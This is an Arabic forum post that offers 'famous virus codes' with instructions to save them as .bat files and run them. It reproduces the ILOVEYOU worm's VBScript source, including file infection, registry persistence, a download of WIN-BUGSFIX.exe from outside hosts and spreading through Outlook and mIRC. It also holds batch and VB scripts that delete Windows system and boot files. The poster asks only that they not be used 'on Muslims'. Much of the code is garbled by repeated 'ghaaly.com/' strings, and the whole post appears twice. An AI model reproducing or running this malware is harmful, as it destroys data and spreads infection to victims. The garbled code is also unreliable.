abdo0099
01-17-2010, 01:57 PM
بسم الله الرحمن الرحيم
اعزائى اعضاء وزوار موقع اليوم اقدم لكم مجموعة متنوعة من اكواد الفيروسات الشهيرة , وننصح بعدم استخدم هذه الفيروسات على نفسك وعندما تريد استخدمها يجب ان يكون لديك برنامج AntiVirus .
كيفية تشغيل هذه الاكواد وعمل فيروسات منها ؟
- كل ماعليك هو ان تاخذ الكود من هنا , وتضعه فى الـ Notepad وتحفظه بامتداد Bat واحزر الضغط عليه .
الاكــــــــــــواد
كود فيروس الحب Love
rem barok -loveletter(vbe) <i hate go to school>
rem by: EVIL-MASTER / [email protected]/ Group /EVIL-ATTACK Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow
eq=""
ctr=0
Set fso = CreateObject("ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing.FileSystemObject")
set file = fso.OpenTextFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Fullname,1)
vbscopy=file.ReadAll
REM main() ' CSS: Main has been REMed out to provide more innoculation. unREM to run.
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\ghaaly.c om/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/FullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
REM spreadtoemail() ' CSS: Causes the worm to propogate itself. REMed for even more innoculation.
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\Run\MSKernel32",dirsystem&"\MSKernel32. vbs"
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL .vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/ HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf
7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/ skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j
nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/ jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V
bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/ sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras
djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy
7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about :blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
Sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.Getghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Name(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ini") or (s="mirc.hlp") then
set ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini=fso.CreateTextFile(folderspec&"\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.i ni")
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "[ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/]"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";mIRC ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "; Please dont edit this ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/... mIRC will corrupt, if mIRC will"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine " corrupt... ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ will affect and will not run correctly. thanks"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";Khaled Mardam-Bey"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";http://www.mirc.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n0=on 1:JOIN:#:{"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n1= /if ( $nick == $me ) { halt }"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n3=}"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega
d
set regedit=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
set out=Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&ma lead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
كود فيروس لتدمير
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\msconfig.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll32.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\regedit.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logos.sys
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logow.sys
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\Sysedit.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.com
@Echo off
c:
cd %WinDir%\System\
deltree /y *.exe
كود فيروس الـ Visual Basic
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe"
كود فيروس الـ HTML
Active-X HTML
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
ملاحضة بعد وضع الكود في bloc note عليك تسجيله بالمتداد Bat
المرجو عدم استعمالها على المسلمين
اعزائى اعضاء وزوار موقع اليوم اقدم لكم مجموعة متنوعة من اكواد الفيروسات الشهيرة , وننصح بعدم استخدم هذه الفيروسات على نفسك وعندما تريد استخدمها يجب ان يكون لديك برنامج AntiVirus .
كيفية تشغيل هذه الاكواد وعمل فيروسات منها ؟
- كل ماعليك هو ان تاخذ الكود من هنا , وتضعه فى الـ Notepad وتحفظه بامتداد Bat واحزر الضغط عليه .
الاكــــــــــــواد
كود فيروس الحب Love
rem barok -loveletter(vbe) <i hate go to school>
rem by: EVIL-MASTER / [email protected]/ Group /EVIL-ATTACK Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow
eq=""
ctr=0
Set fso = CreateObject("ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing.FileSystemObject")
set file = fso.OpenTextFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Fullname,1)
vbscopy=file.ReadAll
REM main() ' CSS: Main has been REMed out to provide more innoculation. unREM to run.
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\ghaaly.c om/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/FullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
REM spreadtoemail() ' CSS: Causes the worm to propogate itself. REMed for even more innoculation.
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\Run\MSKernel32",dirsystem&"\MSKernel32. vbs"
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL .vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/ HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf
7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/ skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j
nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/ jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V
bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/ sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras
djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy
7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about :blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
Sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.Getghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Name(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ini") or (s="mirc.hlp") then
set ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini=fso.CreateTextFile(folderspec&"\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.i ni")
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "[ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/]"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";mIRC ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "; Please dont edit this ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/... mIRC will corrupt, if mIRC will"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine " corrupt... ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ will affect and will not run correctly. thanks"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";Khaled Mardam-Bey"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";http://www.mirc.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n0=on 1:JOIN:#:{"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n1= /if ( $nick == $me ) { halt }"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n3=}"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega
d
set regedit=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
set out=Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&ma lead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
كود فيروس لتدمير
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\msconfig.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll32.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\regedit.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logos.sys
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logow.sys
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\Sysedit.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.com
@Echo off
c:
cd %WinDir%\System\
deltree /y *.exe
كود فيروس الـ Visual Basic
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe"
كود فيروس الـ HTML
Active-X HTML
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
ملاحضة بعد وضع الكود في bloc note عليك تسجيله بالمتداد Bat
المرجو عدم استعمالها على المسلمين